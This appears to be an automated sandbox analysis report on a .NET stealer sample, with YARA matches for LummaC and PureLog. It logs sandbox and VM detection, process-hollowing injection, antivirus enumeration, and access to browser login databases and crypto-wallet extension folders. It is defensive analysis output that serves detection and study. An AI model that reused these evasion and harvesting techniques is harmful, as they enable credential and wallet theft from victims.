Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: MCxU5Fj.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: MCxU5Fj.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: MCxU5Fj.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: Politic.pdb source: MCxU5Fj.exe, WERC21C.tmp.dmp.5.dr
Source:	Binary string: System.Windows.Forms.pdb source: WERC21C.tmp.dmp.5.dr
Source:	Binary string: mscorlib.pdb source: WERC21C.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdbRSDS source: WERC21C.tmp.dmp.5.dr
Source:	Binary string: mscorlib.pdb\| source: WERC21C.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdb source: WERC21C.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERC21C.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdb source: WERC21C.tmp.dmp.5.dr
Source:	Binary string: System.pdb source: WERC21C.tmp.dmp.5.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: MCxU5Fj.exe, ppuPHebcoIQOPplcqD.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.MCxU5Fj.exe.4339550.0.raw.unpack, ppuPHebcoIQOPplcqD.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: MCxU5Fj.exe

Static PE information: 0xAFA985D8 [Wed May 23 05:10:48 2063 UTC]

Source: MCxU5Fj.exe

Static PE information: section name: .CSS

Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00454AFA push ecx; iretd	2_2_00454B1D
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_004583F6 push edi; iretd	2_2_00458415
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00454463 push esi; ret	2_2_00454466
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0045847C push es; retf 0044h	2_2_0045847D
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00454481 push cs; ret	2_2_00454483
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00458513 push edi; iretd	2_2_00458565
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_004585C5 push edi; iretd	2_2_00458565
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00452663 push esp; ret	2_2_00452664
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0045266E pushfd ; retf	2_2_00452673
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00452718 push ebp; iretd	2_2_00452719

Source: MCxU5Fj.exe, ppuPHebcoIQOPplcqD.cs	High entropy of concatenated method names: 'ykGPwgHwAO', 'nW4lBacjpc', 'B2KP3xokPn', 'gaTPYwoJ5G', 'TYLPxbKoYW', 'kO0PvR7N8F', 'U7V1BKO3PY', 'wWfQ2gHoY', 'yC1fpnZwL', 'Hw60rhVR9'
Source: MCxU5Fj.exe, qOk4Li1LtD7jcpHmh1s.cs	High entropy of concatenated method names: 'DOy1h9YEcI', 'idX1TUKobN', 'LiV1FpfZt0', 'i701KaU8Po', 'LUk1Dtqt7k', 'tWR1uNYEvx', 'drh1mtIfRg', 'toM1GSPObS', 'iMU1WPi3w9', 'tnJ146DGBh'
Source: 0.2.MCxU5Fj.exe.4339550.0.raw.unpack, ppuPHebcoIQOPplcqD.cs	High entropy of concatenated method names: 'ykGPwgHwAO', 'nW4lBacjpc', 'B2KP3xokPn', 'gaTPYwoJ5G', 'TYLPxbKoYW', 'kO0PvR7N8F', 'U7V1BKO3PY', 'wWfQ2gHoY', 'yC1fpnZwL', 'Hw60rhVR9'
Source: 0.2.MCxU5Fj.exe.4339550.0.raw.unpack, qOk4Li1LtD7jcpHmh1s.cs	High entropy of concatenated method names: 'DOy1h9YEcI', 'idX1TUKobN', 'LiV1FpfZt0', 'i701KaU8Po', 'LUk1Dtqt7k', 'tWR1uNYEvx', 'drh1mtIfRg', 'toM1GSPObS', 'iMU1WPi3w9', 'tnJ146DGBh'

Source: C:\Users\user\Desktop\MCxU5Fj.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior

Source: C:\Users\user\Desktop\MCxU5Fj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\MCxU5Fj.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\MCxU5Fj.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\MCxU5Fj.exe	Memory allocated: 1880000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Memory allocated: 3330000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Memory allocated: 31A0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\MCxU5Fj.exe

Window / User API: threadDelayed 6137

Jump to behavior

Source: C:\Users\user\Desktop\MCxU5Fj.exe TID: 7556	Thread sleep time: -150000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe TID: 8100	Thread sleep count: 6137 > 30			Jump to behavior

Source: C:\Users\user\Desktop\MCxU5Fj.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\MCxU5Fj.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Last function: Thread delayed

Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: MCxU5Fj.exe, 00000002.00000002.2651329919.00000000010D9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW7
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr	Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: MCxU5Fj.exe, 00000002.00000002.2651329919.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, MCxU5Fj.exe, 00000002.00000002.2651110601.000000000109C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.5.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.5.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\MCxU5Fj.exe

API call chain: ExitProcess graph end node

graph_2-22485

Source: C:\Users\user\Desktop\MCxU5Fj.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\MCxU5Fj.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\MCxU5Fj.exe

Code function: 2_2_0044CA60 LdrInitializeThunk,

2_2_0044CA60

Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 0_2_033358CD mov edi, dword ptr fs:[00000030h]		0_2_033358CD
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 0_2_03335A4A mov edi, dword ptr fs:[00000030h]		0_2_03335A4A

Source: C:\Users\user\Desktop\MCxU5Fj.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\MCxU5Fj.exe

Code function: 0_2_033358CD GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_033358CD

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\MCxU5Fj.exe

Memory written: C:\Users\user\Desktop\MCxU5Fj.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\MCxU5Fj.exe

Process created: C:\Users\user\Desktop\MCxU5Fj.exe "C:\Users\user\Desktop\MCxU5Fj.exe"

Jump to behavior

Source: C:\Users\user\Desktop\MCxU5Fj.exe	Queries volume information: C:\Users\user\Desktop\MCxU5Fj.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\MCxU5Fj.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: MCxU5Fj.exe, 00000002.00000002.2651267991.00000000010C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ndows Defender\MsMpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: MCxU5Fj.exe, 00000002.00000002.2651363380.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, MCxU5Fj.exe, 00000002.00000002.2651557958.0000000001147000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\MCxU5Fj.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: MCxU5Fj.exe PID: 7528, type: MEMORYSTR
Source: Yara match	File source: 2.2.MCxU5Fj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.MCxU5Fj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MCxU5Fj.exe.4339550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2650627998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1470843231.0000000004339000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected PureLog Stealer

Source: Yara match	File source: MCxU5Fj.exe, type: SAMPLE
Source: Yara match	File source: 0.2.MCxU5Fj.exe.4339550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.MCxU5Fj.exe.eb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MCxU5Fj.exe.4339550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1406285774.0000000000EB2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1470843231.0000000004339000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: MCxU5Fj.exe, 00000002.00000002.2651363380.00000000010E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: MCxU5Fj.exe, 00000002.00000002.2651363380.00000000010E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: MCxU5Fj.exe, 00000002.00000002.2651363380.00000000010E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: MCxU5Fj.exe, 00000002.00000002.2651329919.00000000010D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum
Source: MCxU5Fj.exe, 00000000.00000002.1470843231.0000000004339000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
